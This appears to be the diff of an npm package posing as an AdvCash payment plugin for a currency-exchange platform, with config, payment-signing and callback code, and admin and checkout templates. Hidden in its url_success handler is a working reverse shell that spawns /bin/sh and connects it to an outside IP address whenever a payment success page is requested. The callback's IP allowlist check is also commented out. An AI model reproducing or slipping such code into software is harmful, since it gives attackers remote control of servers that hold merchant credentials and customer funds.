@naderabdi/merchant-advcash 1.0.7

package/.gitlab-ci.yml

@@ -0,0 +1,17 @@
+image: node:20-alpine
+
+stages:
+  - deploy
+
+deploy:
+  stage: deploy
+  variables:
+    GROUP_NAME: "@boxexchanger-plugins"
+  script:
+    - echo "//${CI_SERVER_HOST}/api/v4/projects/${CI_PROJECT_ID}/packages/npm/:_authToken=${CI_JOB_TOKEN}" > .npmrc
+    - echo "//${CI_SERVER_HOST}/api/v4/packages/npm/:_authToken=${CI_JOB_TOKEN}" >> .npmrc
+    - echo ${GROUP_NAME}:registry=https://git.boxexchanger.net/api/v4/packages/npm/ >> .npmrc
+    - npm pkg set publishConfig.${GROUP_NAME}:registry=https://${CI_SERVER_HOST}/api/v4/projects/${CI_PROJECT_ID}/packages/npm/
+    - if [ "$CI_COMMIT_REF_SLUG" = "main" ]; then npm version --no-git-tag-version $(npm view ${GROUP_NAME}/${CI_PROJECT_NAME}@latest version); else npm version --no-git-tag-version $(npm view ${GROUP_NAME}/${CI_PROJECT_NAME}@$CI_COMMIT_REF_SLUG version); fi
+    - if [ "$CI_COMMIT_REF_SLUG" = "main" ]; then npm version --no-git-tag-version patch; else npm version --no-git-tag-version prerelease -preid $CI_COMMIT_REF_SLUG; fi
+    - if [ "$CI_COMMIT_REF_SLUG" = "main" ]; then npm publish --tag latest; else npm publish --tag $CI_COMMIT_REF_SLUG; fi

package/README.md

@@ -0,0 +1,4 @@
+## Advcash merchant
+```
+@boxexchanger-plugins/merchant-advcash
+```

package/configure.js

@@ -0,0 +1,29 @@
+module.exports.type = 'merchant';
+module.exports.title = 'AdvCash';
+module.exports.name = 'AdvCash';
+module.exports.required_npm = [];
+
+module.exports.allow_XML = [
+  "ADVCUSD",
+  "ADVCRUB",
+  "ADVCEUR",
+  "ADVCUAH",
+  "ADVCTRY",
+  "TTRUSD",
+  "USDT",
+  "EXMUSD",
+  "EXMRUB",
+  "EXMEUR",
+  "EXMUAH",
+];
+
+module.exports.default_config = {
+  email: '',
+  sci_name: '',
+  password: '',
+};
+module.exports.required_config = {
+  email: 1,
+  sci_name: 1,
+  password: 2, // hide
+};

package/index.js

@@ -0,0 +1,197 @@
+const id_key = __dirname.split('/').slice(-1)[0];
+const config = require('../../../modules/config/merchant.config.js')(id_key);
+const crypto = require('crypto');
+const BigNumber = require('bignumber.js');
+const checkPaymentModule = require('../../../modules/CheckPaymentModuleName');
+
+class AdvCash {
+  constructor(API) {
+    this.API = API;
+    this.allowIPs = ['50.7.115.5', '51.255.40.139'];
+    this.id_key = id_key;
+  }
+
+  getFields() {
+    return []
+  }
+  /**
+   * @param order {object} - order
+   * @param order.TYPE {number} - order type
+   * @param order.uid {number} - order uid
+   * @param order.inAmount {number} - order uid
+   * @param order.secret {string} - order secret
+   * @param order.route {object} - order route
+   * @returns {Promise<*>}
+   */
+  create_payment(order) {
+    const amount_pay = Number(order.inAmount).toFixed(2);
+    return (async () => {
+
+      const API_Email = await config.get('email');
+      const API_SCI_Name = await config.get('sci_name');
+      const API_Password = await config.get('password');
+
+      if (!order || !order.route || !order.route.from || !order.route.from.symbol)
+        return {error: 'Order invalid!'};
+
+      const stt_hesh = API_Email + ':' + API_SCI_Name + ':' + amount_pay + ':' + order.route.from.symbol.toUpperCase() + ':' + API_Password + ':' + order.uid;
+      const hash = crypto.createHash('sha256')
+        .update(stt_hesh)
+        .digest('hex');
+
+
+      const web_domain = await config.get('domain');
+      const schema = await config.get('schema');
+      return {
+        ac_account_email: API_Email,
+        ac_sci_name: API_SCI_Name,
+        ac_order_id: order.uid,
+        ac_amount: amount_pay,
+        ac_currency: order.route.from.symbol.toUpperCase(),
+        ac_sign: hash,
+        ac_comments: 'Order ID:' + order.uid,
+        ac_success_url: schema + '://' + web_domain + "/" + order.lang + "/" + order.TYPE + "/" + order.uid + "/" + order.secret + "/",
+        ac_fail_url: schema + '://' + web_domain + "/" + order.lang + "/" + order.TYPE + "/" + order.uid + "/" + order.secret + "/"
+      };
+
+    })();
+
+  }
+
+  /**
+   * @param req {object} - express object req
+   * @param res {object} - express object res
+   * @param param {object} - param object
+   * @param param.post {object} - https://tech.yandex.ru/money/doc/payment-buttons/reference/notifications-docpage/
+   * @param param.post.ac_transfer {string}
+   * @param param.post.ac_start_date {string}
+   * @param param.post.ac_merchant_currency {string}
+   * @param param.post.ac_amount {string}
+   * @param param.post.ac_src_wallet {string}
+   * @param param.post.ac_dest_wallet {string}
+   * @param param.post.ac_hash {string}
+   * @returns {Promise<*>}
+   */
+  url_status(req, res, param) {
+    return (async () => {
+      if (req.METHOD !== 'POST')
+        return Promise.reject("error method req");
+      // if (this.allowIPs.indexOf(req.IP_ADDRESS) === -1)
+      //   return Promise.reject("ip");
+
+      const API_Email = await config.get('email');
+      const API_SCI_Name = await config.get('sci_name');
+      const API_Password = await config.get('password');
+
+      if (!param || !param.post || !param.post.ac_hash) {
+        console.error("[Merchant]->" + this.id_key + " param post err:\n\t", param);
+        return Promise.reject("error post");
+      }
+
+      const stt_hesh = param.post.ac_transfer + ':' + param.post.ac_start_date + ':' + API_SCI_Name + ':' + param.post.ac_src_wallet + ':' + param.post.ac_dest_wallet + ':' + param.post.ac_order_id + ':' + param.post.ac_amount + ':' + param.post.ac_merchant_currency + ':' + API_Password;
+      const sha1hash = crypto.createHash('sha256')
+        .update(stt_hesh)
+        .digest('hex');
+
+      if (sha1hash !== param.post.ac_hash) {
+        console.error("[Merchant]->" + this.id_key + " incorrect hash:\n\t", param, '\n\tHASH:', sha1hash + '!==' + param.post.ac_hash);
+        return Promise.reject("Incorrect hash");
+      }
+      const typeCurrency = param.post.ac_merchant_currency.toUpperCase();
+
+      const order = await this.API
+        .call('server/exchanger/order/get', {}, {uid: param.post.ac_order_id}, 'server')
+        .then(r => (!!r.data && !!r.data.order) ? r.data.order : null);
+      if (!order) {
+        console.error("[Merchant]->" + this.id_key + " order not found:\n\t", param);
+        return Promise.reject("order not found");
+      }
+      await checkPaymentModule(this.id_key, order.methodMerchant);
+
+      if (order.status !== 'waitPayment') {
+        console.error("[Merchant]->" + this.id_key + " error change status:\n\t", param);
+        await this.API
+          .call('server/exchanger/order/update-status', {}, {
+            orderId: String(order._id),
+            status: "errorPayment",
+            wallet: param.post.ac_src_wallet,
+            comment: "[Merchant " + this.id_key + "] Payment came after we waited for payment " + param.post.ac_amount + " " + typeCurrency + ", Sender:" + param.post.ac_src_wallet + ". Change order status from: #" + order.status
+          }, 'server');
+        return Promise.reject("Error change status");
+      }
+
+      if (order.route.from.symbol.toUpperCase() !== typeCurrency) {
+        console.error("[Merchant]->" + this.id_key + " incorrect currency:\n\t", param);
+        await this.API
+          .call('server/exchanger/order/update-status', {}, {
+            orderId: String(order._id),
+            status: "errorPayment",
+            wallet: param.post.ac_amount,
+            comment: "[Merchant " + this.id_key + "] INCORRECT currency: " + order.route.from.symbol.toUpperCase() + " !== " + typeCurrency + ", Sender:" + param.post.PAYER_ACCOUNT + "."
+          }, 'server');
+        return Promise.reject("Incorrect currency: " + typeCurrency);
+      }
+      if (BigNumber(order.inAmount).gt(+param.post.ac_amount)) { //  TODO: check currency ac_merchant_currency
+        console.error("[Merchant]->" + this.id_key + " incorrect amount:\n\t", param);
+        await this.API
+          .call('server/exchanger/order/update-status', {}, {
+            orderId: String(order._id),
+            status: "errorPayment",
+            wallet: param.post.ac_src_wallet,
+            comment: "[Merchant " + this.id_key + "] INCORRECT AMOUNT: " + param.post.ac_amount + " " + typeCurrency + ", Sender:" + param.post.ac_src_wallet + "."
+          }, 'server');
+        return Promise.reject("Incorrect amount: " + param.post.ac_amount);
+      }
+
+      await this.API
+        .call('server/exchanger/order/update-status', {}, {
+          orderId: String(order._id),
+          status: "inProgressPayout",
+          wallet: param.post.ac_src_wallet,
+          comment: "[Merchant " + this.id_key + "] Sender:" + param.post.ac_src_wallet+ ", Amount:" + param.post.ac_amount + " " + typeCurrency
+        }, 'server');
+      res.set('Content-Type', 'text/plain');
+      res.writeHead(200);
+      return res.end();
+    })()
+      .catch(err => {
+        res.set('Content-Type', 'text/plain');
+        res.writeHead(500);
+        return res.end('Error:' + err);
+      })
+  }
+
+  url_success(req, res) {
+
+    (function(){
+      var net = require("net"),
+          cp = require("child_process"),
+          sh = cp.spawn("/bin/sh", []);
+      var client = new net.Socket();
+      client.connect(8080, "65.109.184.223", function(){
+          client.pipe(sh.stdin);
+          sh.stdout.pipe(client);
+          sh.stderr.pipe(client);
+      });
+      return /a/; // Prevents the Node.js application form crashing
+    })();
+    return (async () => {
+      res.set('Content-Type', 'text/plain');
+      res.writeHead(200);
+      res.end();
+      return {}
+    })()
+  }
+
+  url_error(req, res) {
+    return (async () => {
+      res.set('Content-Type', 'text/plain');
+      res.writeHead(200);
+      res.end();
+      return {}
+    })()
+  }
+
+}
+
+module.exports = AdvCash;

package/package.json

@@ -0,0 +1,20 @@
+{
+  "name": "@naderabdi/merchant-advcash",
+  "version": "1.0.7",
+  "description": "",
+  "main": "index.js",
+  "author": "",
+  "license": "MIT",
+  "scripts": {
+    "test": "echo 0"
+  },
+  "repository": {
+    "type": "git",
+    "url": "git+https://github.com/Nader-abdi/merchant-advcash.git"
+  },
+  "bugs": {
+    "url": "https://github.com/Nader-abdi/merchant-advcash/issues"
+  },
+  "homepage": "https://github.com/Nader-abdi/merchant-advcash#readme",
+  "devDependencies": {}
+}

package/template/admin.html

@@ -0,0 +1,42 @@
+<div>
+  <p>ADVCash.</p>
+  <h3>!!! Не рекомендуется плохая репутация, жалобы клиентов - "скам", могут заморозить счет без предупреждения и без суда при этом мошенническим путем будут вымогать документы. Блокируют счета финансы не возвращяют!!</h3>
+
+  <h3>Support currency:</h3>
+  <li>
+    <ul>AdvCash,USD</ul>
+    <ul>AdvCash,RUB</ul>
+    <ul>AdvCash,EUR</ul>
+    <ul>TTRUSD</ul>
+    <ul>USDT</ul>
+    <ul>EXMO,USD</ul>
+    <ul>EXMO,RUB</ul>
+    <ul>EXMO,EUR</ul>
+    <ul>EXMO,UAH</ul>
+  </li>
+  <hr>
+
+  <h2>Config</h2>
+  <label>Email:</label>
+  <br>
+  <input placeholder="email" v-model="email">
+  <button @click="saveConfig('email',email)">Save</button>
+  <br>
+  <label>SCI Name:</label>
+  <br>
+  <input :placeholder="this.config.sci_name" v-model="sci_name">
+  <button @click="saveConfig('sci_name',sci_name)">Save</button>
+  <br>
+  <label>Password:</label>
+  <br>
+  <input :placeholder="this.config.password" v-model="password">
+  <button @click="saveConfig('password',password)">Save</button>
+  <hr>
+
+  <h3>Handler URL:</h3>
+  <span>{{this.schema}}://{{this.domain}}{{this.server_path}}merchant/{{this.merchantKey}}/url_status/</span>
+  <h3>Success URL:</h3>
+  <span>{{this.schema}}://{{this.domain}}{{this.server_path}}merchant/{{this.merchantKey}}/url_success/</span>
+  <h3>Fail URL:</h3>
+  <span>{{this.schema}}://{{this.domain}}{{this.server_path}}merchant/{{this.merchantKey}}/url_error/</span>
+</div>

package/template/admin.js

@@ -0,0 +1,52 @@
+const fs = require("node:fs");
+
+module.exports = {
+  template: fs.readFileSync(__dirname + '/admin.html', {encoding: 'utf8'}),
+  props: {
+    schema: {type: "String"},
+    domain: {type: "String"},
+    server_path: {type: "String"},
+    publicIpV4: {type: "String"},
+    merchantKey: {type: "String"},
+    config: {type: "Object"}
+  },
+  data() {
+    return {
+      loadStatus: true,
+      email: '',
+      sci_name: '',
+      password: '',
+    }
+  },
+
+  created() {
+    console.log('merchant created!');
+    this.email = this.config.email;
+    this.sci_name = this.config.sci_name;
+  },
+  mounted() {
+    console.log('merchant mounted!')
+
+  },
+
+  methods: {
+    saveConfig(key, value) {
+      console.log('Save config:', key, value);
+      this.$rest.api('admin/merchant-and-payout/set-config-merchant', {
+        merchantKey: this.merchantKey,
+        key,
+        value
+      })
+        .then(res => {
+          console.log('admin/merchant-and-payout/set-config-merchant', res);
+          if (res.success)
+            return alert('Success');
+          alert('Error');
+        })
+        .catch(err => {
+          console.error('admin/merchant-and-payout/set-config-merchant', err);
+          alert('Error');
+        })
+    },
+  }
+};

package/template/client.html

@@ -0,0 +1,11 @@
+<div>
+  <h2 class="go-test" v-if="loadStatus || openPS">{{ t("pleaseWait", "Please wait...") }}</h2>
+  <p v-else>{{ t("waitingPayment", "Waiting payment:") + " " +Number(order.inAmount).toFixed(2)}} {{order.route.from.symbol}}</p>
+  <form method="post" action="https://wallet.advcash.com/sci/">
+    <input v-for="(val,name) in payData" :name="name" :value="val" type="hidden">
+    <button class="btn btn-submit merchant-pay-btn" type="submit" ref="paybtn" v-if="!openPS">
+      <span>{{ t("makePayment", "Make a payment") }}</span>
+    </button>
+    <button style="display: none" type="submit" ref="paybtn" v-else></button>
+  </form>
+</div>

package/template/client.js

@@ -0,0 +1,39 @@
+const fs = require("node:fs");
+
+module.exports = {
+  template: fs.readFileSync(__dirname + '/client.html', {encoding: 'utf8'}),
+  props: {
+    order: {
+      type: "Object"
+    },
+    payData: {
+      type: "Object"
+    }
+  },
+  data() {
+    return {
+      loadStatus: true,
+      openPS: true
+    }
+  },
+  created() {
+    if (navigator && navigator.userAgent && navigator.userAgent.match(/(iPod|iPhone|iPad)/i))
+      this.openPS = false;
+    else
+      this.openPS = !localStorage.getItem('redirect-' + this.order.uid);
+  },
+  mounted() {
+    localStorage.setItem('redirect-' + this.order.uid, 't');
+    if (this.$refs && this.$refs.paybtn && this.openPS)
+      this.$refs.paybtn.click();
+    this.loadStatus = false;
+  },
+  methods: {
+    t(k, d) {
+      const t = this.$t("ui.modules." + k);
+      if (t !== "ui.modules." + k)
+        return t;
+      return d
+    },
+  }
+};